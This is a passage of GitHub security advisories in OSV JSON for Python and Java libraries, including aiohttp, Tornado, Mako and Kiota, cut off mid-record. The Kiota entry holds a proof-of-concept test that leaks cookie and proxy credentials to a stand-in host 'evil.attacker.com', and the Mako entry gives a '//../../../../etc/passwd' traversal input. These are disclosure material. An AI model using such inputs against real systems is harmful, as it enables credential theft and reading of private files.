"github_reviewed_at": "2026-04-01T21:19:22Z",
"nvd_published_at": "2026-04-01T21:16:59Z",
"severity": "LOW"
},
"details": "### Summary\n\nAn unbounded DNS cache could result in excessive memory usage possibly resulting in a DoS situation.\n\n### Impact\n\nIf an application makes requests to a very large number of hosts, this could cause the DNS cache to continue growing and slowly use excessive amounts of memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98",
"id": "GHSA-hcc4-c3v8-rx92",
"modified": "2026-04-06T16:46:44Z",
"published": "2026-04-01T21:19:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hcc4-c3v8-rx92"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34513"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP Affected by Denial of Service (DoS) via Unbounded DNS Cache in TCPConnector"
}
GHSA-428G-F7CQ-PGP5
Vulnerability from github – Published: 2025-12-22 20:20 – Updated: 2025-12-23 16:01Impact
Schema.load(data, many=True) is vulnerable to denial of service attacks. A moderately sized request can consume a disproportionate amount of CPU time.
Patches
4.1.2, 3.26.2
Workarounds
# Fail fast
def load_many(schema, data, **kwargs):
if not isinstance(data, list):
raise ValidationError(['Invalid input type.'])
return [schema.load(item, **kwargs) for item in data]
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "marshmallow"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0rc1"
},
{
"fixed": "3.26.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "marshmallow"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.1.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68480"
],
"database_specific": {
"cwe_ids": [
"CWE-405"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-22T20:20:07Z",
"nvd_published_at": "2025-12-22T22:16:09Z",
"severity": "MODERATE"
},
"details": "### Impact\n\n`Schema.load(data, many=True)` is vulnerable to denial of service attacks. A moderately sized request can consume a disproportionate amount of CPU time.\n\n### Patches\n\n4.1.2, 3.26.2\n\n### Workarounds\n\n```py\n# Fail fast\ndef load_many(schema, data, **kwargs):\n if not isinstance(data, list):\n raise ValidationError([\u0027Invalid input type.\u0027])\n return [schema.load(item, **kwargs) for item in data]\n```",
"id": "GHSA-428g-f7cq-pgp5",
"modified": "2025-12-23T16:01:21Z",
"published": "2025-12-22T20:20:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/marshmallow-code/marshmallow/security/advisories/GHSA-428g-f7cq-pgp5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68480"
},
{
"type": "WEB",
"url": "https://github.com/marshmallow-code/marshmallow/commit/d24a0c9df061c4daa92f71cf85aca25b83eee508"
},
{
"type": "PACKAGE",
"url": "https://github.com/marshmallow-code/marshmallow"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Marshmallow has DoS in Schema.load(many)"
}
GHSA-W2FM-2CPV-W7V5
Vulnerability from github – Published: 2026-04-01 19:45 – Updated: 2026-04-06 16:46Summary
Insufficient restrictions in header/trailer handling could cause uncapped memory usage.
Impact
An application could cause memory exhaustion when receiving an attacker controlled request or response. A vulnerable web application could mitigate these risks with a typical reverse proxy configuration.
Patch: https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22815"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T19:45:17Z",
"nvd_published_at": "2026-04-01T21:16:58Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nInsufficient restrictions in header/trailer handling could cause uncapped memory usage.\n\n### Impact\n\nAn application could cause memory exhaustion when receiving an attacker controlled request or response. A vulnerable web application could mitigate these risks with a typical reverse proxy configuration.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36",
"id": "GHSA-w2fm-2cpv-w7v5",
"modified": "2026-04-06T16:46:33Z",
"published": "2026-04-01T19:45:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22815"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "aiohttp allows unlimited trailer headers, leading to possible uncapped memory usage"
}
GHSA-7J59-V9QR-6FQ9
Vulnerability from github – Published: 2026-05-07 01:49 – Updated: 2026-05-14 20:53Summary
The RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme.
This vulnerability is present in the RedirectHandlers for:
https://github.com/microsoft/kiota-dotnet https://github.com/microsoft/kiota-java https://github.com/microsoft/kiota-python https://github.com/microsoft/kiota-typescript https://github.com/microsoft/kiota-http-go
Details
Only the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target.
This is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp's built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota's broken implementation.
Vulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.90 and earlier:
boolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());
boolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());
if (!sameScheme || !sameHost) {
requestBuilder.removeHeader("Authorization");
// BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed
}
PoC
-
Clone the repository: git clone --depth 1 https://github.com/microsoft/kiota-java.git cd kiota-java
-
Create the PoC test file at: components/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java
With this content:
package com.microsoft.kiota.http.middleware;
import static org.junit.jupiter.api.Assertions.*;
import com.microsoft.kiota.http.KiotaClientFactory;
import okhttp3.*;
import okhttp3.mockwebserver.*;
import org.junit.jupiter.api.Test;
public class SecurityPoC {
@Test
void crossHostRedirectLeaksCookies() throws Exception {
Request original = new Request.Builder()
.url("http://trusted.example.com/api")
.addHeader("Authorization", "Bearer token")
.addHeader("Cookie", "session=SECRET")
.addHeader("Proxy-Authorization", "Basic cHJveHk6cGFzcw==")
.build();
Response redirect = new Response.Builder()
.request(original).protocol(Protocol.HTTP_1_1)
.code(302).message("Found")
.header("Location", "http://evil.attacker.com/steal")
.body(ResponseBody.create("", MediaType.parse("text/plain")))
.build();
Request result = new RedirectHandler().getRedirect(original, redirect);
assertNotNull(result);
assertEquals("evil.attacker.com", result.url().host());
assertNull(result.header("Authorization")); // stripped (good)
assertEquals("session=SECRET", result.header("Cookie")); // LEAKED
assertEquals("Basic cHJveHk6cGFzcw==", result.header("Proxy-Authorization")); // LEAKED
}
@Test
void endToEndProof() throws Exception {
var evil = new MockWebServer();
evil.start();
evil.enqueue(new MockResponse().setResponseCode(200));
var trusted = new MockWebServer();
trusted.start();
trusted.enqueue(new MockResponse().setResponseCode(302)
.setHeader("Location", evil.url("/steal")));
OkHttpClient client = KiotaClientFactory.create(
new Interceptor[]{new RedirectHandler()}).build();
client.newCall(new Request.Builder().url(trusted.url("/api"))
.addHeader("Cookie", "session=SECRET").build()).execute();
trusted.takeRequest();
RecordedRequest captured = evil.takeRequest();
assertEquals("session=SECRET", captured.getHeader("Cookie")); // LEAKED to evil server
evil.shutdown();
trusted.shutdown();
}
}
-
Run the tests: ./gradlew :components:http:okHttp:test --tests "com.microsoft.kiota.http.middleware.SecurityPoC"
-
Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures. Both tests confirm Cookie and Proxy-Authorization headers are sent to the attacker's server on cross-host redirect.
Impact
The kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.
Attack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim's session cookies, proxy credentials, and API keys from the redirected request.
Impact: - Session hijacking via leaked Cookie headers - Corporate proxy credential theft via leaked Proxy-Authorization - API key theft via leaked custom auth headers (X-API-Key, etc.)
All consumers of kiota-java are affected, including Microsoft Graph SDK for Java.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.microsoft.kiota:microsoft-kiota-abstractions"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Microsoft.Kiota.Abstractions"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.22.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "microsoft-kiota-http"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "kiota-typescript"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.0-preview.100"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/microsoft/kiota-http-go"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44503"
],
"database_specific": {
"cwe_ids": [
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T01:49:01Z",
"nvd_published_at": "2026-05-14T16:16:24Z",
"severity": "HIGH"
},
"details": "### Summary\nThe RedirectHandler middleware in microsoft/kiota-java (com.microsoft.kiota:microsoft-kiota-http-okHttp v1.9.0) and other Kiota libraries fails to strip sensitive HTTP headers when following 3xx redirects to a different host or scheme. \n\nThis vulnerability is present in the RedirectHandlers for:\n\nhttps://github.com/microsoft/kiota-dotnet\nhttps://github.com/microsoft/kiota-java\nhttps://github.com/microsoft/kiota-python\nhttps://github.com/microsoft/kiota-typescript\nhttps://github.com/microsoft/kiota-http-go\n\n\n### Details\nOnly the Authorization header is removed; Cookie, Proxy-Authorization, and all custom headers are forwarded to the redirect target.\n\nThis is the default middleware in every kiota-java HTTP client created via KiotaClientFactory.create(). OkHttp\u0027s built-in redirect handler (which handles this correctly) is explicitly disabled at line 63 of KiotaClientFactory.java in favor of kiota\u0027s broken implementation.\n\nVulnerable code in RedirectHandler.java lines 107-116 (getRedirect method) in versions 1.90 and earlier:\n\n```\nboolean sameScheme = locationUrl.scheme().equalsIgnoreCase(requestUrl.scheme());\nboolean sameHost = locationUrl.host().toString().equalsIgnoreCase(requestUrl.host().toString());\nif (!sameScheme || !sameHost) {\nrequestBuilder.removeHeader(\"Authorization\");\n// BUG: Cookie, Proxy-Authorization, and all other headers are NOT removed\n}\n```\n\n\n### PoC\n1. Clone the repository:\ngit clone --depth 1 https://github.com/microsoft/kiota-java.git\ncd kiota-java\n\n2. Create the PoC test file at:\ncomponents/http/okHttp/src/test/java/com/microsoft/kiota/http/middleware/SecurityPoC.java\n\nWith this content:\n```\npackage com.microsoft.kiota.http.middleware;\nimport static org.junit.jupiter.api.Assertions.*;\nimport com.microsoft.kiota.http.KiotaClientFactory;\nimport okhttp3.*;\nimport okhttp3.mockwebserver.*;\nimport org.junit.jupiter.api.Test;\n\npublic class SecurityPoC {\n@Test\nvoid crossHostRedirectLeaksCookies() throws Exception {\nRequest original = new Request.Builder()\n.url(\"http://trusted.example.com/api\")\n.addHeader(\"Authorization\", \"Bearer token\")\n.addHeader(\"Cookie\", \"session=SECRET\")\n.addHeader(\"Proxy-Authorization\", \"Basic cHJveHk6cGFzcw==\")\n.build();\nResponse redirect = new Response.Builder()\n.request(original).protocol(Protocol.HTTP_1_1)\n.code(302).message(\"Found\")\n.header(\"Location\", \"http://evil.attacker.com/steal\")\n.body(ResponseBody.create(\"\", MediaType.parse(\"text/plain\")))\n.build();\nRequest result = new RedirectHandler().getRedirect(original, redirect);\nassertNotNull(result);\nassertEquals(\"evil.attacker.com\", result.url().host());\nassertNull(result.header(\"Authorization\")); // stripped (good)\nassertEquals(\"session=SECRET\", result.header(\"Cookie\")); // LEAKED\nassertEquals(\"Basic cHJveHk6cGFzcw==\", result.header(\"Proxy-Authorization\")); // LEAKED\n}\n\n@Test\nvoid endToEndProof() throws Exception {\nvar evil = new MockWebServer();\nevil.start();\nevil.enqueue(new MockResponse().setResponseCode(200));\nvar trusted = new MockWebServer();\ntrusted.start();\ntrusted.enqueue(new MockResponse().setResponseCode(302)\n.setHeader(\"Location\", evil.url(\"/steal\")));\nOkHttpClient client = KiotaClientFactory.create(\nnew Interceptor[]{new RedirectHandler()}).build();\nclient.newCall(new Request.Builder().url(trusted.url(\"/api\"))\n.addHeader(\"Cookie\", \"session=SECRET\").build()).execute();\ntrusted.takeRequest();\nRecordedRequest captured = evil.takeRequest();\nassertEquals(\"session=SECRET\", captured.getHeader(\"Cookie\")); // LEAKED to evil server\nevil.shutdown();\ntrusted.shutdown();\n}\n}\n```\n\n3. Run the tests:\n./gradlew :components:http:okHttp:test --tests \"com.microsoft.kiota.http.middleware.SecurityPoC\"\n\n4. Result: BUILD SUCCESSFUL, 2 tests passed, 0 failures.\nBoth tests confirm Cookie and Proxy-Authorization headers are sent to the attacker\u0027s server on cross-host redirect.\n\n### Impact\nThe kiota-java bug is more severe because it leaks ALL sensitive headers simultaneously (Cookie + Proxy-Authorization + custom auth headers), not just one type.\n\nAttack scenario: An attacker who can trigger a cross-origin redirect from a trusted API (via open redirect, MITM, or DNS rebinding) captures the victim\u0027s session cookies, proxy credentials, and API keys from the redirected request.\n\nImpact:\n- Session hijacking via leaked Cookie headers\n- Corporate proxy credential theft via leaked Proxy-Authorization\n- API key theft via leaked custom auth headers (X-API-Key, etc.)\n\nAll consumers of kiota-java are affected, including Microsoft Graph SDK for Java.",
"id": "GHSA-7j59-v9qr-6fq9",
"modified": "2026-05-14T20:53:18Z",
"published": "2026-05-07T01:49:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/microsoft/kiota-java/security/advisories/GHSA-7j59-v9qr-6fq9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44503"
},
{
"type": "PACKAGE",
"url": "https://github.com/microsoft/kiota-java"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Kiota abstractions RedirectHandler leaks Cookie/Proxy-Authorization headers on cross-host redirect"
}
GHSA-29H4-R29X-HCHV
Vulnerability from github – Published: 2026-05-29 19:32 – Updated: 2026-06-02 21:41Summary
amazon-redshift-python-driver is the official Python connector for Amazon Redshift. In versions 2.1.13 and earlier, the driver insufficiently validates data received from the server during query result processing. A rogue server or man-in-the-middle could leverage this to execute arbitrary code on the client.
Impact
When a client connects to a rogue server implementing the PostgreSQL wire protocol, the server can send specially crafted query responses that the driver processes without adequate input validation. This could result in arbitrary code execution in the client process, potentially enabling command execution, file system access, or credential theft with the privileges of the client application.
Impacted versions: <=2.1.13
Patches
This has been addressed in amazon-redshift-python-driver version 2.1.14 (https://github.com/aws/amazon-redshift-python-driver/releases/tag/v2.1.14). Amazon Redshift recommends upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.
References
If there are any questions or comments about this advisory, contact AWS Security via the issue reporting page or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
Acknowledgement
Amazon Redshift would like to thank Kexin Chen (@ckx-sec) for collaborating through the coordinated disclosure process.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.1.13"
},
"package": {
"ecosystem": "PyPI",
"name": "redshift-connector"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-8838"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T19:32:28Z",
"nvd_published_at": "2026-05-18T21:16:41Z",
"severity": "CRITICAL"
},
"details": "### Summary\namazon-redshift-python-driver is the official Python connector for Amazon Redshift. In versions 2.1.13 and earlier, the driver insufficiently validates data received from the server during query result processing. A rogue server or man-in-the-middle could leverage this to execute arbitrary code on the client.\n\n### Impact\nWhen a client connects to a rogue server implementing the PostgreSQL wire protocol, the server can send specially crafted query responses that the driver processes without adequate input validation. This could result in arbitrary code execution in the client process, potentially enabling command execution, file system access, or credential theft with the privileges of the client application.\n\nImpacted versions: \u003c=2.1.13\n\n### Patches\nThis has been addressed in amazon-redshift-python-driver version 2.1.14 (https://github.com/aws/amazon-redshift-python-driver/releases/tag/v2.1.14). Amazon Redshift recommends upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.\n\n### References\nIf there are any questions or comments about this advisory, contact AWS Security via the issue reporting page or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.\n\n### Acknowledgement\nAmazon Redshift would like to thank Kexin Chen (@ckx-sec) for collaborating through the coordinated disclosure process.",
"id": "GHSA-29h4-r29x-hchv",
"modified": "2026-06-02T21:41:29Z",
"published": "2026-05-29T19:32:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aws/amazon-redshift-python-driver/security/advisories/GHSA-29h4-r29x-hchv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8838"
},
{
"type": "WEB",
"url": "https://github.com/aws/amazon-redshift-python-driver/commit/69a69dfdead75918e20384da52bcd760ded8dbca"
},
{
"type": "WEB",
"url": "https://aws.amazon.com/security/security-bulletins/2026-033-aws"
},
{
"type": "PACKAGE",
"url": "https://github.com/aws/amazon-redshift-python-driver"
},
{
"type": "WEB",
"url": "https://github.com/aws/amazon-redshift-python-driver/releases/tag/v2.1.14"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "amazon-redshift-python-driver vulnerable to Remote Code Execution via eval() Injection"
}
GHSA-78CV-MQJ4-43F7
Vulnerability from github – Published: 2026-03-11 22:17 – Updated: 2026-03-11 22:17Values passed to the domain, path, and samesite arguments of RequestHandler.set_cookie were not completely validated in versions of Tornado prior to 6.5.5. In particular, semicolons would be allowed, which could be used to inject attacker-controlled values for other cookie attributes.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.5.4"
},
"package": {
"ecosystem": "PyPI",
"name": "tornado"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T22:17:00Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "Values passed to the `domain`, `path`, and `samesite` arguments of `RequestHandler.set_cookie` were not completely validated in versions of Tornado prior to 6.5.5. In particular, semicolons would be allowed, which could be used to inject attacker-controlled values for other cookie attributes.",
"id": "GHSA-78cv-mqj4-43f7",
"modified": "2026-03-11T22:17:00Z",
"published": "2026-03-11T22:17:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-78cv-mqj4-43f7"
},
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/commit/24a2d96ea115f663b223887deb0060f13974c104"
},
{
"type": "PACKAGE",
"url": "https://github.com/tornadoweb/tornado"
},
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/releases/tag/v6.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Tornado has incomplete validation of cookie attributes"
}
GHSA-QJXF-F2MG-C6MC
Vulnerability from github – Published: 2026-03-12 14:19 – Updated: 2026-06-08 19:51In versions of Tornado prior to 6.5.5, the only limit on the number of parts in multipart/form-data is the max_body_size setting (default 100MB). Since parsing occurs synchronously on the main thread, this creates the possibility of denial-of-service due to the cost of parsing very large multipart bodies with many parts.
Tornado 6.5.5 introduces new limits on the size and complexity of multipart bodies, including a default limit of 100 parts per request. These limits are configurable if needed; see tornado.httputil.ParseMultipartConfig. It is also now possible to disable multipart/form-data parsing entirely if it is not required for the application.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.5.4"
},
"package": {
"ecosystem": "PyPI",
"name": "tornado"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-31958"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-12T14:19:52Z",
"nvd_published_at": "2026-03-11T20:16:16Z",
"severity": "HIGH"
},
"details": "In versions of Tornado prior to 6.5.5, the only limit on the number of parts in `multipart/form-data` is the `max_body_size` setting (default 100MB). Since parsing occurs synchronously on the main thread, this creates the possibility of denial-of-service due to the cost of parsing very large multipart bodies with many parts. \n\nTornado 6.5.5 introduces new limits on the size and complexity of multipart bodies, including a default limit of 100 parts per request. These limits are configurable if needed; see `tornado.httputil.ParseMultipartConfig`. It is also now possible to disable `multipart/form-data` parsing entirely if it is not required for the application.",
"id": "GHSA-qjxf-f2mg-c6mc",
"modified": "2026-06-08T19:51:12Z",
"published": "2026-03-12T14:19:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-qjxf-f2mg-c6mc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31958"
},
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/commit/119a195e290c43ad2d63a2cf012c29d43d6ed839"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2026-140.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/tornadoweb/tornado"
},
{
"type": "WEB",
"url": "https://github.com/tornadoweb/tornado/releases/tag/v6.5.5"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00000.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Tornado is vulnerable to DoS due to too many multipart parts"
}
GHSA-V92G-XGXW-VVMM
Vulnerability from github – Published: 2026-04-16 21:16 – Updated: 2026-06-05 14:13Summary
TemplateLookup.get_template() is vulnerable to path traversal when a URI starts with // (e.g., //../../../secret.txt). The root cause is an inconsistency between two slash-stripping implementations:
Template.__init__strips one leading/usingif/sliceTemplateLookup.get_template()strips all leading/usingre.sub(r"^\/+", "")
When a URI like //../../../../etc/passwd is passed:
1. get_template() strips all / → ../../../../etc/passwd → file found via posixpath.join(dir_, u)
2. Template.__init__ strips one / → /../../../../etc/passwd → normpath → /etc/passwd
3. /etc/passwd.startswith(..) → False → check bypassed
Impact
Arbitrary file read: any file readable by the process can be returned as rendered template content when an application passes untrusted input directly to TemplateLookup.get_template().
Note: this is exploitable at the library API level. HTTP-based exploitation is mitigated by Python's BaseHTTPRequestHandler which normalizes double-slash prefixes since CPython gh-87389. Applications using other HTTP servers that do not normalize paths may be affected.
Fix
Changed Template.__init__ to use lstrip("/") instead of stripping only a single leading slash, so both code paths handle leading slashes consistently.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.3.10"
},
"package": {
"ecosystem": "PyPI",
"name": "Mako"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41205"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T21:16:40Z",
"nvd_published_at": "2026-04-23T19:17:29Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`TemplateLookup.get_template()` is vulnerable to path traversal when a URI starts with `//` (e.g., `//../../../secret.txt`). The root cause is an inconsistency between two slash-stripping implementations:\n\n- `Template.__init__` strips **one** leading `/` using `if`/slice\n- `TemplateLookup.get_template()` strips **all** leading `/` using `re.sub(r\"^\\/+\", \"\")`\n\nWhen a URI like `//../../../../etc/passwd` is passed:\n1. `get_template()` strips all `/` \u2192 `../../../../etc/passwd` \u2192 file found via `posixpath.join(dir_, u)`\n2. `Template.__init__` strips one `/` \u2192 `/../../../../etc/passwd` \u2192 `normpath` \u2192 `/etc/passwd`\n3. `/etc/passwd`.startswith(`..`) \u2192 `False` \u2192 **check bypassed**\n\n### Impact\n\nArbitrary file read: any file readable by the process can be returned as rendered template content when an application passes untrusted input directly to `TemplateLookup.get_template()`.\n\nNote: this is exploitable at the library API level. HTTP-based exploitation is mitigated by Python\u0027s `BaseHTTPRequestHandler` which normalizes double-slash prefixes since CPython gh-87389. Applications using other HTTP servers that do not normalize paths may be affected.\n\n### Fix\n\nChanged `Template.__init__` to use `lstrip(\"/\")` instead of stripping only a single leading slash, so both code paths handle leading slashes consistently.",
"id": "GHSA-v92g-xgxw-vvmm",
"modified": "2026-06-05T14:13:04Z",
"published": "2026-04-16T21:16:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sqlalchemy/mako/security/advisories/GHSA-v92g-xgxw-vvmm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41205"
},
{
"type": "WEB",
"url": "https://github.com/sqlalchemy/mako/commit/e05ac61989a7fb9dd7dcde6cfd72dc48328719a3"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/mako/PYSEC-2026-88.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/sqlalchemy/mako"
},
{
"type": "WEB",
"url": "https://github.com/sqlalchemy/mako/releases/tag/rel_1_3_11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Mako: Path traversal via double-slash URI prefix in TemplateLookup"
}
GHSA-765J-9R45-W2Q2
Vulnerability from github – Published: 2025-09-11 16:51 – Updated: 2025-09-13 04:44Impact
When Flask-AppBuilder is configured to use OAuth, LDAP, or other non-database authentication methods, the password reset endpoint remains registered and accessible, despite not being displayed in the user interface. This allows an enabled user to reset their password and be able to create JWT tokens even after the user is disabled on the authentication provider.
Patches
Upgrade to Flask-AppBuilder version 4.8.1 or later
Workarounds
If immediate upgrade is not possible: - Manually disable password reset routes in the application configuration - Implement additional access controls at the web server or proxy level to block access to the reset my password URL. - Monitor for suspicious password reset attempts from disabled accounts
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "flask-appbuilder"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.8.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58065"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-11T16:51:57Z",
"nvd_published_at": "2025-09-11T18:15:35Z",
"severity": "MODERATE"
},
